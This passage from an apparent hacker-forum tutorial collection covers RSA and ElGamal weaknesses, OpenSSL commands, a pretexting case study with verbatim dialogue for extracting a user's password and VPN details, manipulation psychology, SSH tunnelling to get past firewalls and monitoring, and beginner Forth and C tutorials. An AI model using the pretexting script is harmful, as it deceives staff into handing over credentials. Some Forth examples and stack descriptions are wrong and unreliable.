fact the best known way to attack RSA is to actually recover the secret key by factorizing N.
Diffie-Hellman Key Exchange

You will likely have heard of this if you have ever read anything about RSA. It is a method for
securely swapping a secret key for communications with for example a stream cipher. It works as
follows: we choose a large prime p, and find a primitive root, g, modulo p.
Person A chooses some x and sends g^x mod p to person B. B chooses y and sends g^y to A. Then
both A and B compute g^(xy) modulo p. This is then there secret key.
The attacker seeks to find g^(xy) from p, g, g^x, g^y (mod p). It is conjectured, although unproven,
that this problem is as hard as the discrete log problem.
Attacks against RSA and friends
Okay, you may be thinking that RSA is invincible without a Quantum Computer or something that
hasn't been (publicly) discovered yet. Well there are practical problems, many of which you may
have come across.
Let's give an example (this is called, rather amusingly if you know your math, a homomorphism
attack):
A bank sends a message (A, B) where A is the clients name, and B is the amount to be credited to
her account. They encrypt the message using RSA and send (Y, Z) where Y = Aê, Z = Bê (mod
N).
This scheme is clearly broken: I enter into a transaction to add $100 to my account. I observe the
resulting (Y, Z) that is sent. Then I send (Y, Z^3). If you think about this for a second, it will credit
my account with $1000000 (since Z^3 = B^(3e) = (B^3)ê).
Of course even if I had no idea about RSA I could of course just keep repeating (Y, Z) (a Replay
Attack)!
Clearly this is a problem. Before you rush out and try this, it is of course not very likely to work!
You may say "well of course, if they use the signature scheme of RSA then this won't work". You'd
be very wrong. Let's look at the signature scheme of RSA: We pick a random message L say and
send it to our recipient. We then encrypt that message, but this time we use our private key - so we
send L^d. The recipient can then use our public key to decrypt L^d and ensure it is L. Since we are
the only ones with the private key it must have come from us. This is RSA authentication. It is very
Page 42
useful for many things, but it only provides a signature of the sender, not a signature of the message.
So it will not protect against the homomorphism attack. Also anyone can produce valid signatures
which we have to hope are not meaningful. Another method of RSA authentication is to send a
random message, encrypted normally to the person whose identity we wish to verify. If we then
later receive a message ending in that, then we can be sure it came from them. When we discuss
SSL, we will see that if we don't use signatures then man in the middle attacks are also possible,
meaning that we get very little real security from the encryption.
There is a better solution - we sign the actual message. For that we can use the ElGamal Signature
Scheme.
The ElGamal Signature Scheme

We should probably start by defining a trapdoor function - something you will probably know of. It
is simply a map from the Cartesian product of messages and keys to a set of signatures (in other
words given a message and a key it returns a signature) such that without knowledge of the key, we
can check a signed message is valid, yet it is very difficult to forge (meaningful) signed messages.
ElGamal does this. It works as follows:
We pick a large prime p. We then find a primitive root mod p. We then also pick an exponent u
between 0 and p. Then our public key is p, g and y = gû (mod p). Our private key is just u.
To sign a message m (a number between 0 and p) we choose a random exponent k, coprime to p-1,
between 0 and p and then compute r and s such that:
1. r = g^k (mod p)
2. m = ur + ks (mod p-1)
Then we sign the message with (r,s).
To verify the message we calculate g^m, and check it is equal to (y^r)(r^s) (mod p). This works
since g^m = g^(ur + ks) = ((gû)^r)((g^k)^s) = (y^r)(r^s) modulo p.
It is believed, but not proven, that forging an ElGamal signature is as hard as solving the discrete
logarithm.
Breaking ElGamal
Like most of the attacks I'm discussing, they are theoretical, and rely on a poor implementation.
One thing we must remember to do in ElGamal is choose a new k for each message. Otherwise, if
we have used the same k twice for messages A and B, then:
Page 43
A = ur + ks1
B = ur + ks2
(where messages are signed (r,s1) and (r,s2))
then A - B = k(s1 - s2) modulo p-1
So there are gcd(s1-s2, p-1) solutions for k, and we check r = g^k (mod p). Once we have found k,
then A = ur + ks1 (mod p-1) so there are exactly gcd(r, p-1) solutions for u, and we can check y =
gû (mod p). This way we recover the secret key.
It should also be noted that several existential forgeries are known for ElGamal.
There are a great many uses for RSA and friends. One use you may not have thought of is bit
commitment: where we want to send a message in such a way that the recipient cannot read the
message until we send more information, yet we cannot change the message. Uses for this might
include selling stock market tips etc. We can simply encrypt using RSA to ourself, send the
message, and it can only be real when we send our private key. Another very elegant method uses
coding theory, not cryptography.
OpenSSL
To review what we now know about, and see how RSA is used in real situations, here's how to use
SSL to create RSA keys for practical purposes, perhaps for an IRC server or a web server.
First we create an RSA Private Key:
Code:
$openssl genrsa -des3 -out server.key 1024
Generating RSA private key, 1024 bit long modulus

.........................................................++++++
........++++++
e is 65537 (0x10001)
Enter PEM pass phrase:
Verifying password - Enter PEM pass phrase:
We should now be able to guess what this all means. we are encrypting our private key with triple-
DES for extra security (hence the request for a pass phrase) and generating a 1024 bit key. We also
note that we are told the value of e: 65537. This is actually a fairly common value due to some nice
Page 44
properties of the number.
If we want to remove the pass phrase we can. A reason to do this is that Apache or our IRC daemon
etc. will ask for the pass-phrase each time the server is started. This may not be convenient. If we do
this however it is critical the file is kept secure - if the server is compromised then anyone can use
our unencrypted private key. To do this we do:
Code:
cp server.key server.key.org
openssl rsa -in server.key.org -out server.key
(Here we make a copy of the encrypted key first.)
The next step to actually use this is to create a Certificate - containing the public key amongst other
things. This is also used to verify your identity. One issue with public key cryptography is verifying
you have the correct public key for your recipient - else we have a classic man in the middle attack
where you have no idea who you are actually encrypting to. To get around this we can get our
public key 'signed' by someone we trust, who has verified we are who we say we are. This way
users need only have hard verified copies of the certificate authorities who they trust, and can
therefore use that to trust new certificates. We do this by creating a CSR (Certificate Signing
Request) which we then send to Thawte or Verisign etc. who will verify our identity and issue a
signed certificate. We create a CSR as follows:
Code:
openssl req -new -key server.key -out server.csr
Country Name (2 letter code) [GB]:

State or Province Name (full name) [Berkshire]:
Locality Name (eg, city) [Newbury]:
Organization Name (eg, company) [My Company Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server's hostname) []:
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
filling in the fields as appropriate.
It is a common misconception that getting a certificate signed is a difficult or expensive process -

there exist free certificate authorities (although they provide a lower level of verification).
Page 45
However it still requires some effort and a few practical issues to deal with. What if we just want to
create a public key that people can verify another way? We can 'self-sign' our certificate. Note this
is never a good thing to do - after all it clearly provides no verification whatsoever that we are who
we say we are! However if our users can obtain the fingerprint of our public key another way
(maybe we have it on our website) then it can still provide a higher level of security than plaintext
transmission. We do this as follows:
Code:
$openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
Signature ok
---SOME OUTPUT HERE---
If we use this in a web server many browsers will refuse access with self-signed certificates. But if
we know what we are doing we can get round this. In IRC clients for example there is often an
option to accept invalid certificates etc.
Once we've created server.crt and server.key we can place them in whatever directory is used for
SSL certificates by our server software, and set up our server and go. If we have a self-signed
certificate we can tell people the fingerprint (eg on our website) so they can verify the certificate
and accept ot. That's all there is to it!
Final Thoughts
One thing we have mentioned several times is 'diffusion and confusion'. We should explain this.
Claude Shannon defined these as the key two properties of a practically secure cipher in 1949.
Confusion refers to making the relationship between the key and the ciphertext as complex and as
involved as possible. Diffusion refers to the property that redundancy in the statistics of the
plaintext is 'diffused' in the statistics of the ciphertext. In a cipher with good diffusion flipping an
input bit should change each output bit with probability of one half - this is called the Avalanche
Effect and is a desirable property - one of the primary design objectives of a block cipher or a hash
(which I haven't discussed) for example.
Another thing I should mention is Elliptic Curve Cryptography. Very briefly. Complimentary to
RSA it is based around the difficulty of the discrete logarithm problem (in the context now of more
general large finite groups). The solutions of an elliptic curve (an equation of the form y = x^3 + ax
+ b), together with the point at infinity form an abelian group. If we restrict x and y to a finite field
then that group is finite and often large, and it is believed the discrete logarithm on such a group is
more difficult that the corresponding problem in the underlying field's multiplicative group. One
advantage is that much shorter keys can be used for a comparable level of security to RSA. As you
can see the mathematics is a little trickier.
Miscellaneous
Since this has been a rather all-over-the-place post, I'll finish up with a few miscellaneous bits and
pieces.
Page 46
Firstly a reminder of modular arithmetic in case you were wanting an outline of that.
We say that two numbers x,y are equivalent modulo n if x-y is a multiple of n. Equivalently they
have the same remainder when divided by n. This clearly defines an equivalence relation on in the
integers. In particular we can define addition and multiplication between the classes by simply
choosing a representative and doing standard arithmetic. So for example, working modulo 5 say,
3=8 mod 5, so we can calculate 3 + 2 mod 5 by doing either 3 + 2 = 5, or 8 + 2 = 10, and both 10
and 5 are of course in the same equivalence class modulo 5. This also works for multiplication, and
most importantly the operations are Well Defined (it doesn't matter what representative choose).
Facts to remember include: division doesn't always work. For example modulo 4, there is no
number we get from 1/2. Indeed a number modulo n has a multiplicative inverse if and only if it is
coprime to n. In particular that means every number has an inverse modulo a prime number (a
critical point in RSA). A fairly substantial theorem tells us that modulo p, where p is prime, there is
(possibly lots) a number g such that for any x there is an a with gâ = x. g is called a primitive root
or a generator. In other words the multiplicative group is cyclic if you like that sort of thing. Also
we need to know Fermat's Little Theorem - if we raise a number to the power of p-1 modulo p then
it always gives 1. A critically important generalization used in RSA says that modulo n, x^phi(n) =
1 mod n. (phi(n) is the totient function - in RSA we only need to know it is (p-1)(q-1), more
generally in is the number of numbers coprime to n).
That probably won't help much if you don't know modular arithmetic, but if you do, then it will
remind you of what you need to know to understand RSA. Perhaps someone else can explain it
better - only I think this post is long enough!
Finally since I said we would, and now we know about cryptography, let's break d4de's 'Closecrypt
Encryption System v1.0'. You can find his code in another thread. We will break the 'CSPRNG'.
A brief outline about how the RNG works: we feed the program an initial seed consisting of a few
digits between 0 and 255 which we shall call s0, s1, s2, s3,... Then a random number is produced
using that seed, which we shall call b0. Then the seed state is updated (similar principle to the
LFSR) in the following way: 2*s0 + b0 replaces s0. 2*s1 + s0 + b0 replaces s1. 2*s2 + s1 + s0 + b0
replaces s2. And so on. This happens each time a random number is output (replacing b0 with b1
and b2 and so on). All this is done modulo 256, so that we remain between 0 and 255.
This is clearly flawed - if we captured some of the output, then we know b0,b1,... say. Can we
reconstruct the state of the seed knowing just this? At first glance no, since we don't know the s0, s1
etc. that is used. However the multiplication by 2 is a big mistake - for example consider just s0, the
first digit of the seed state. each round we are multiplying it by 2 and adding the random number
output. Eventually the unknown variables, namely s0,s1,... etc. will have been doubled at least 8
times, so they will disappear modulo 256 (since 2^k = 0 modulo 256 for k greater or equal to 8). So
if we have enough of the output stream we have all the information required to figure out the state
of the seed. Mathematically we are solving a set of equivalence relations, which become entirely
dependent on the output vector when working modulo 256 after a while. So in three easy steps:
Page 47
1 - Write a recursive function to solve the recurrence relationships, ignoring the terms we don't
know, since they are zero anyway.
2 - Take the data, use this recursive function to calculate the state of the seed.
3 - start predicting future output.
You can see my code to do this in the same thread as the 'Closecrypt Encryption System v1.0' was
posted. My code also does a little extra work to allow you to guess the seed state even if you don't
have enough output data.
And that's it!
Off-topic
Apologies that this is such a messy article - some bits are brushed over a little quick as I wanted to
cover quite a lot. I hope it's useful. If it goes down okay, then I'll happily write about any other
crypto topics people would like to know about, or talk in more technical detail about anything I've
already covered. Also I may write something about actually doing practical attacks on SSL and SSH
in a real situation (man in the middle, statistical SSH attacks) that you can actually try out, since this
article is all rather abstract and theoretical (sorry!).
Hope that helps.
Page 48
Social Engineering
Author: Linx
This is based upon experience and is more of an educational story, hope it helps you all.
What is Social Engineering?

Social engineering is the art of manipulating the weakest point of security in any network.... the
users.
The end user is the weakest point in any network. You can have state of the art firewalls, IDS, anti
virus and regularly update your machines general security with patches and hot fixes, but at the end
of the day, if one user is unaware or slips up... its all for nothing.
Please do not disregard this as another tutorial that says the following
Quote:
“Yoo should tell the victim dat deez filez contains |\/|4j0r pr0n!!! then when they downloadz it they
get infected!!!”
This is in a word completely idiotic to write a tutorial on and should be reserved for poser 12 year
olds who just discovered Sub7 and doesn't quite understand the concept of not being a complete and
total skid mark.... I mean skiddy.
This tutorial will explain in detail a case study situation (genuine with names changed) and go into
detail about decisions and conversations that resulted in a system breach.
So its hacking.....?
Not as such. Hacking is such a loose word now-a-days. Hacking used to refer to a programmer and
still does today, however the media have turned this into a frenzied word. Now when the public
hears the word hack they think of someone who is the equivalent of a terrorist and should be put
away for life.
Hacking to me is the art of making something do what its not ideally designed to... in this case,
make the user and/or staff members of a firm give you access unknowingly.
So its psychology.....?
Shut up and read...
Page 49
Case Study...
OK onto my case study. This is based on a true story. Names and company names have been
changed accordingly. Please note this case study was performed under a live environment where the
IT team of this particular firm where aware of my actions. In short, this was legal, don't try this at
home...
I was told to attempt to bypass the security of Alpine Ltd. I had been told that any method was valid
inclusive of brute force as this would assist in helping the IT security team test their IDS and also
their internal reporting.
I didn't ideally want to take on a security system heads up that look like this one. This company had
approximately 2000 end users (according to the corporate website) and I was also aware of at the
time, a VPN entry point. I decided to attempt social engineering as im not particularly fond of
breaching VPN via brute force. Its noisy, I wanted to be a ninja, not Rambo.
I browsed the corporate website for a while and found many names of top ranking people within the
business, these being heads of offices and directors. This also included site names, bonus.
So as of right then if I was to call their switchboard (number on the website) I could most likely
pose as one of them, failing this I could pretend that I knew them, ooooor I could just keep schtum
and carry on research.
So I had a few names, nothing major but a start. I called switchboard and asked for a few names of
people in the IT department. She said she couldn't give direct names so I got diverted through to a
general number.
When the IT guy picked up he answered as expected “Desktops, John speaking.”. First name
discovered.
The conversation went something like this...
Quote:
“Hi John my names Davey I work at site 223 in London”
“How can I help”
“Yeah Ive got a slight issue with my machine and its coming up with some weird errors when im
trying to print, can I send a screen shot direct to you?”
“I can remote on now if you want?”
“Wont be able to do that im afraid, on my laptop and I need it for a presentation in a meeting in a
few minutes.”
Page 50
“Best send the screen shot then and il log the call”
“Nice one! Whats your email?”
“John.Long@aplineltd.com”
“Thanks John”
I now had a complete name of someone within the desktops team.
Moving swiftly on, I now had names and telephone numbers of major players within this firm and
office locations, which in turn, got me a desktop engineers full name.
After briefly going over the list of major players and their departments I decided to call a few
people in the sales area. This had a manager by the name of Kirsty Sayes. Sales areas normally have
users which have laptops as they work off site. These laptops 9.5 times out of 10, have some form
of dial-up/VPN enabled.
Called the switchboard again
Quote:
“Hi, this is John from desktops”
“How can I help?”
“Yeah im looking to get in touch with Kirsty Sayes but she told me shes going to be off all week,
are you able to put me through to one of her sales staff at all so I can run a few checks on a
laptop?”
“Certainly, il put you through...”
**** NOTE ****

The reason I don't want to speak with Kirsty directly is that managers of this sort tend to have very
close relations with the IT team, especially with home users.
**** ****
So I got put through to this sweet little lass named Cheryl.
Quote:
“Hi Cheryl, this is John from the desktops team.”
“Hey”
“Cheryl I was just wondering, I'm in charge of making sure all the laptops in the firm are suitable
for a migration to take place possibly early next year and need to test a few accounts from test
Page 51
machines”
“......right?”
“Just curious but you don't mind if we borrow your account details to test them with..... I mean we
could just reset the password but we don't want to put anyone out of action for the day”
“Should be a problem”
“OK, im assuming you sign in with your first initial and last name” (a standard for most
companies)
“yeah”
“Whats your last name Cheryl?”
“Parker”
“And your password Cheryl?”
“passw0rd1”
“Perfect, and Cheryl do you usually connect through VPN?”
“Yes”
“Diamond, OK one last thing, I just need to check some details on your VPN client, this is just to
double check because we don't want to get anything wrong.......”
We then went on to discuss every option within her VPN client. Now knowing a users logon,
password and VPN credentials I was in.
Conclusion:
To sum up, social engineering is the art of manipulating the user. With just a few phone calls I
managed to convince people I was someone I was not and also obtain remote login details for a
sales agent (in a real life scenario that would have opened the door to stealing company sales
figures and client information). This would have also left the network wide open for privilege
escalation.
Information from the companies website is more vital than you first may think. One name can make
all the difference. Knowing a location that you can confidently say that you are based at and
convince the user your calling from is also vital.
I hope you enjoyed this tutorial. Social engineering is not something you can really learn from
reading. Its more of a trial and error skill.
Basic Psychology
Many of the things I have learnt have been from psychologists and surprisingly enough... ninjas.
Throughout my papers I will point out good books and links to sites to learn more.
On with the show...
Page 52
Security in Communities
A quick dive into the world of how feeling secure can assist social hackers...
Community... Coalition... Society... Alliance... association... union... All these words relate to one
main factor, that is, belonging to a group.
So what is it that entices us into these so called groups? Is it the social aspect? No.
We go round in groups no matter what as a form of security. When security is offered to an

individual its almost always chosen over someones personal free will (This statement will almost
certainly cause debate).
For an example of this il refer to a few experiments held by psychologists. I wont go into great
detail but googling the names will reveal a wealth of information on them, Ive also provided wiki
links for immediate research.
The Third Wave - Ron Jones

(http://en.wikipedia.org/wiki/The_Third_Wave)
Ron Jones essentially turned a class of school kids in the 1960's into a near replica of NAZI
Germany. These students were found to have given up their free will and adopted everything the
teacher gave to them. Students concentration and compliance increased amongst other perks
however the experiment was terminated at the end of week 1. This really is an interesting read on
the power of leadership (or dictatorship) in a community.
Milgram Experiment - Stanley Milgram

(http://en.wikipedia.org/wiki/Milgram_experiment)
The experiment consisted of a supervisor (the psychologist), the actor in the electric chair and the
individual who was being experimented on played the electrocutioner.
The actor in the chair would act in distress and pain, yet the user would be comforted by the
supervisory figure into believing that it was not actually hurting the gentleman in the chair. The
user continued on regardless of the screams and complaints of heart conditions from the actor. An
interesting view on how someone responds to an authority figure.
Stanford Prison Experiment - Philip Zimbardo

(http://en.wikipedia.org/wiki/Stanford_prison_experiment)
Page 53
Taking regular members of the public and putting them into a prison environment. One half guards,
the other half cons. This study showed the effects of positions of power within society and how
quickly some people can embrace it and revolt against it.
Many more experiments exist but these 3 should be fine to provide a base line for the psychological
anatomy of the human mind.
In all these 3 experiments we witness people in stressful situations but relying on the security of
those around them. When that security is provided, it seems that the end user can be led to do
anything.
Users led to electrocute people who, they are sure, they are causing pain and torment. Users who
formerly believed in free will, within several hours turned into a new world order and users who
given the chance of a position of power will use it and abuse it.
So where am I heading with this as a social hacking concept...
When security is offered, it is accepted. Promise of security can be related to a mothers love. When
you fell over as a baby, your mother nurtured you, your father protected you and any siblings you
had (despite the odd bit of bickering) stood by you. Security isn't just protecting someone from
harm, its making them feel relaxed and calm in your presence.
In the world there are many things someone can get stressed about and not many people will come
to their aid. Money is always a problem with most people as is relationship issues, work and more
likely than not if offered a way out of these situations, we will comply to most things.
If someone offered to remove your money worries, would you accept?

If someone made you feel more comfortable socially, would you accept?
If someone said that if you'd performed a certain act (within reason) you'd be promoted, would you
accept?
From a social hackers perspective this can be utilized to attack a group and/or certain individuals to
entice them to assist you or do your will.
Conclusion...
I know this seems like a scatty tutorial but there is sense within the lines. In short, everyone needs a
form of security and its a key part into understanding how to manipulate users from the social
hackers perspective.
Page 54
SSH Tutorials
SSH Tunneling Explained

Author: Linx
I don't know how everyone else feels about this, but SSH tunneling goes without explanation all the
time within tutorials etc. So today im taking a different approach... im going to explain everything I
can about SSH tunneling and also how and why we configure Firefox the way we do to use it. This
is not intended to be a full blown tutorial on how to set up an SSH server, although I may be doing
one shortly as im in the middle of setting up a Linux server on my network at home. But server side
configuration is not the aim of this specific tutorial!
There comes a time in every hacker/engineers life/day when we want our data to remain secure
from prying eyes. This tends to be when we use our laptops on Wifi hot spots or if we browse
online profiles containing personal information from work... and school i suppose.
An SSH tunnel aids in encrypting data transmitted from your terminal so that no packet sniffers etc
can read data from your machine. It works by sending requests to an external SSH server (set up by
yourself) and in turn receives the packets from this said external server. Hence, all data is encrypted
in transit when traveling through the network you are currently on... il show you with a diagram
later on but stay with me here.
Lets just quickly cover how a website request is performed...
1) User types into the URL field the site name

(www.google.com)
2) Users client then sends a request to the DNS server on
the network who responds with the IP of the requested
URL (74.125.19.147)
3) Client then connects to port 80 (\\74.125.19.147:80)
4) Website data is sent back to client
Now this all might seem relatively simple and to be

perfectly honest... it is. but lets move on and incorporate an SSH tunnel...
Page 55
1) User types into the URL field the site name (www.google.com)
2) Users client then sends a request to
the DNS server on the network who
responds with the IP of the requested
URL (74.125.19.147)
3) Client sends encrypted data request to
SSH tunnel requesting data from
74.125.19.147
4) SSH Tunnel sends encrypted data
back to client
OK so now we can see that the SSH tunnel is now involved and packets are being encrypted around
the network... but your still making DNS queries on the domain so we need to direct all DNS
queries to the SSH server, otherwise, you'll find that despite the data is encrypted the web monitor
on the LAN will still be aware of where you are going to online.
To do this we simply load up Firefox and configure it to perform DNS queries elsewhere. Firstly
make sure you've set the remote proxy settings in the relevant tab (i think its either "Connections"
or "LAN Settings" im at work now and don't have Firefox on my PC). Once this has been done we
can move on.
In the URL field of Firefox type "about:config". Search or filter through the on screen display for
"network.proxy.socks_remote_dns". Once found change this to True. This will essentially divert all
DNS queries to the SSH server. In turn this will mean that the only thing any server monitor will be
able to see coming from your terminal is encrypted requests being sent to your SSH server IP.
So now when we look at the process list again:
1) User types into the URL field the site

name (www.google.com)
2) Users client then sends a request to
the remote DNS server
3) SSH server sends back encrypted
data advising that the IP is
74.125.19.147
4) Client sends encrypted data request
to SSH tunnel requesting data from
74.125.19.147
5) SSH Tunnel sends encrypted data
back to client
Page 56
Apologies for the crude drawings.... i was using MSPaint to do them :S.
So that concludes the SSH Tunnel explanation.
Page 57
How to Configure SSH
Author: Xiao Tan
The main concepts, I will not go in detail, but will describe the practicalities of ssh tunneling.
Let's say you're at Starbucks or an airport. You connect to an unsecured wireless network with your
laptop and log in to your US account. When you send information over a network, it's typically sent
in plaintext over the whole network. Any skiddie do some packet sniffing, or even ARP poisoning
and intercept the data that you send, such as passwords, etc.
You're at the library. Or school You want to play "The Hardest Game in the World". The firewall
blocks the sites hosting the game. You feel depressed that level 190712 is still not beaten.
Both these cases can almost always be resolved by ssh tunneling. SSH stands for "secure shell" and
unlike telnet, encrypts all the traffic sent through. We can utilize this capability and transmit Internet
traffic through an encrypted ssh tunnel, thus bypassing firewalls and guaranteeing safe transmission
of your data.
Requirements: Internet, a server that has an ssh service running on it, lastly, an ssh client. (In this
case, putty).
Download putty from Here (http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe)
1) Open it up, and enter the hostname

or IP address of the server along with
the port. SSH listens at a default port
of 22, but depending on the server
settings, the port number may vary.
This is for security purposes. Mine is
set to 2222 as an example. Make sure
ssh is ticked.
If the server is password based

authentication, skip down to step 3, as
the xterm window will prompt for a
username and password. You should
either own the server or have an
account on it.
Page 58
2) If the server has a public-private key
authentication, you will need to specify
the location of the private key. The
public key that complements your
private one should already be on the
server. I won't go in detail of
generating keys in this tut.
3) Now comes for setting up the

tunnels. Go down to "tunnels" at the
left and pick a port that isn't blocked by
a firewall if you're behind one. Leave
the destination box empty and choose
the option "dynamic". Leave the
second option as "auto"
Page 59
Then press add. I used a random port of 6060.
4)You may change any other

settings in the putty client if you
want. Once you're all set, press
"Open". You should get a prompt.
Press yes, or no, whatever one you

want. It's just asking if you want the
server's host keys cached into your
machine's registry.
Page 60
6)If you used password
authentication, just enter the
username and password. If you
used public key based
authentication, enter the pass phrase
of the private key. If all goes well,
you should be presented with a
logged in shell on the server.
7) Now, to initialize the forwarded

tunnels. Open up Firefox. Or
another browser that supports
SOCKS proxies. Go to the
network tab, and choose settings.
8) Down at the SOCKS proxies

section, enter localhost (127.0.0.1) as
the host, and enter the port that you
forwarded. Also make sure that
SOCKS V5 is ticked. Press okay. Go
to a site to test it out.
Well there you have it! All your

Internet browsing traffic will be
secure and firewall free.
Page 61
Programming Tutorials
Forth
Author: Blackjackhkr
Forth, created in the 1970's by Charles (Chuck) Moore. Forth uses Reverse Polish Notation instead
of Infix notation for math. In Reverse Polish Notation you have your two operands followed by the
operator whereas in Infix Notation you have your two operands separated by an operator. For
example...
Infix Notation...
Code:
2+2*3/2=5
Reverse Polish Notation...
Code:
22+3*2/=6
Though, Revers Polish Notation looks fairly odd, it tends to be more convenient than Infix Notation
because you get to eliminate the use of the order of operations. So, why does Forth have to be the
"odd ball" and use the mathematical notation that most people have probably never even heard of?
Because it is a stack oriented language. It's basically like having a bunch of plates stacked on top of
each other. You can put a plate on top of another plate, so the newest plate is always on top, and
usually the first one you get. Of course, you can get the plate underneath it or a plate in the middle,
but that takes more work than just grabbing one off of the top. This is how Forth works, except with
numbers of course. Every time you enter a number in Forth it adds the number to the stack. you can
then use "words' to manipulate the numbers on the stack. Forth's words are like the words in a
dictionary; They are words that are accompanied by definitions. Once you enter a word into Forth
(via the interpreter) it will look up that words definition in the dictionary which will be either more
Forth code or assembly code. Lets look back at the Reverse Polish Notation example above:
Code:
22+3*2/
First, 2 and 2 are added to the stack so the stack now looks like this (from top to bottom):
Code:
Page 62
2
2
Then the word '+' is used, which in turn takes the first two numbers off of the stack and adds them
together, deleting the two numbers from the stack but adding the sum to the stack, so it looks like
this:
Code:
4
Then it adds 3 to the stack...
Code:
3
4
Now the interpreter sees the word '*' and looks it up in the dictionary, which in turn multiplies the
first two numbers on the stack, deleting them and adding the product to the stack, so it looks like
this:
Code:
12
Now, we add 2 to the stack...
Code:
2
12
Then the interpreter see's the word '/' which in turn is defined as so it takes the first two number off
the stack, divides them, deletes them, and adds the quotient to the stack...
Code:
6
This seems quite simple, though, say there's three numbers in the stack and you need to add all three
of them together. Your stack would look like this...
Code:
Page 63
3
1
6
and your code would look like this...
Code:
316++
(or something similar.)
But what if we want to multiply, say the first and third numbers together. Then, we would have to
use the word 'ROT' (note, that in older Forth interpreters it is necessary to use all caps). ROT takes
the third number in a stack and moves it to the top. To represent this, we can use a diagram such as
Code:
(n1 n2 n3 -- n3 n1 n2)
where the left-most side is the original stack and the right-most side is the modified stack.
There are many of definitions to alter the stack but the most common used are...
Code:
DUP (n1 -- n1 n1)
ROT (n1 n2 n3 -- n3 n1 n2)
OVER (n1 n2 -- n2 n1 n2)
DROP (n1 n2 -- n2) or simple (n1 -- )
PICK (n1 n2... nx -- nx n1 n2) <-- I'm not sure if this is completely correct or not.
PICK is a special definition that is used to pick any number from the stack. It takes the first number
on the stack and deletes it, then picks that number from the stack. For example, if a stack were to
look like...
Code:
5
6
9
8
and we were to run
Page 64
Code:
3 PICK
then the new stack would look like
Code:
9
5
6
8
Well, this is all fine and dandy, but it's usually nice to be able to see what ever is on the stack
printed on the screen. This is possible by using the word '.' which is defined so it takes the first
number off of the stack and prints it on the screen, though in return it also deletes the first value off
the stack so it's usually accompanied by a DUP. For example...
Code:
2 2 + DUP .
This will add 2 and 2 together to get 4, put for on the stack, duplicate 4 so there are now two 4's on
the stack and then print 4 on the screen. The stack now looks simply like
Code:
4
You can also output characters and string of text too with the word '."' (pronounced dot-quote). The
string must have a space between the word dot-quote word and it must end with a '"' at the end of
the string. For example...
Code:
2 2 + ." Two plus two is:" .
Forth allows us to add words to it's dictionary temporarily. The word ":" tells the interpreter that the
next word typed in will be added to the dictionary and everything proceeding it will be that words
definition. To end the definition you simply use the word ';'. Here's an example...
Code:
: ADD5 5 + ;
Page 65
For now on, if you type ADD5 it will in turn run it's definition
Code:
5+
Forth also allows for input, as we will see later on, though first, it is necessary to cover one other
thing. Loops and conditional statements. A loop, as in most other languages, will simple execute a
bit of code until a certain condition is met. A conditional statement is a statement that checks
whether something is true or not.
In Forth, the words '=' (equals) '<' (less than) and '>' (greater than) are used to compare two
numbers. Each one pulls the first two numbers off of the stack and checks whether the statement is
true, and then replaces them with either a 0 or a 1. These are known as flags, where as a 0 means
false and a one means true. For example...
Code:
22+4=
will produce a stack simply consisting of 1.
This is pretty useless until we put it together with either a conditional statement or loop. Both
statements and loops have to be within a definition in the dictionary. The main conditional
statement in Forth is the if statement, normally consisting of the words 'IF' 'ELSE' and 'ENDIF'. The
'IF' word checks whether the top number on the stack is 0 or 1 and if it is 1 it will then execute the
code between IF and ELSE; if it is 0 it will execute all of the code between ELSE and ENDIF.
ENDIF is simply a marker telling the interpreter where the end of the IF statement is. Here's an
example...
Code:
: CHECK 2 2 + 4 = IF ." True" ELSE ." False" ENDIF ;
This example will print 'True' to the screen.
Loops are also a very valuable part of forth. The most common loop is the BEGIN-UNTIL loop.
The word 'BEGIN' is used to tell the interpreter when the beginning of the loop is. The 'UNTIL'
word is used much like the word IF in the fact that it checks to see if the top number on the stack is
0 or 1, though if it is 0 the code between BEGIN and UNTIL will repeat again. For example...
Code:
Page 66
: LO 0 BEGIN 1 + DUP DUP DUP . 10 = UNTIL ;
This bit of code will print all of the numbers between 1 and 10 to the screen.
Loops are commonly used for input from the keyboard. The word 'KEY' will capture the next key
you press and add it's ASCII value to the top of the stack. When you press the key, it will not be
echo'd so you will not see the key on the screen. In turn you can use the word 'EMIT' to take the
ASCII value off the top of the stack and print it's corresponding letter/number/symbol on the screen,
though, like many other words in Forth, it will delete it off of the stack so you may want to
accompany it with a DUP. For example...
Code:
KEY DUP DUP ." You pressed ASCII value " . ." which is equivilant to " EMIT
This is fine if all you need is input for one character but what if you want a persons name? Then
you can enclose KEY and EMIT in a loop.
Code:
: GN BEGIN KEY DUP DUP EMIT 13 = UNTIL ;
This code will let the user type whatever they want and put the ASCII values of the string on the
stack. Notice at the end of the line of code that 13 is added to the stack and compared to the ASCII
value for the Return key (ASCII 13) so that UNTIL will terminate once the user hits Return (also
known as the Enter key).
Something that should be mentioned before I wrap up this paper is that Forth is neither a fully
interpreted or compiled language. It is both, thus it is a threaded language. For GNU/Linux you can
get GForth to compile/interpret forth code from the main repositories. It also comes with a block
editor which is used to edit code outside of the interpreter (though I won't go into details of how to
use it here). A block editor is pretty old school and was used years ago when Forth was used as an
operating system, though today, a text editor will work fine. You can simply type code in a text
editor just as you would in the interpreter and run 'gforth [file]' (assuming your using the GForth
compiler/interpreter) to run your code.
Disclaimer:
This is just a basic overview of the Forth language. There is much, much more to the language than
what I've included in this paper. To find out more about Forth, just Google it. You can also check
out http://www.complang.tuwien.ac.at/for...rth/Docs-html/ for the (official?) gforth docs
Page 67
Creating libraries in C/C++
Author: Blackjackhkr
This time I'll go through how to create libraries in C/C++. I will assume you're using Linux and gcc.
Also you need to have a basic understanding of C or C++ to get the hang of this. I remember when I
started using Linux and quite soon after started programming. I wondered very much what the fuck
was up with /lib and /usr/lib and where the code that I thought was in the different headers in
/usr/include was. A very elite person I know told it was routines for applications and operating
systems. I didn't really get the hang of it then but I've got it later. Now I've decided I'd like to share
this knowledge to you.
Libraries are just compiled code stored for future use. They also have a header file to reference the
functions and classes and other things in them. The big advantage is that you don't have to compile
it more than once and after that you're able to use them how many times you want. The headers
exists for you and your compiler to provide descriptions (function prototypes, class definitions....)
so you know how to interface with the library. Libraries are also good if you want to release some
code but don't want to share the code as they're compiled. But please don't do this as we want all
code to be open source.
There is three different kinds of libraries; static, shared and dynamic. Static libraries is just an
archive of object (.o) files. They are linked into the executable of every program that uses them.
This results in each different application using the library having it's completely own copy of it in
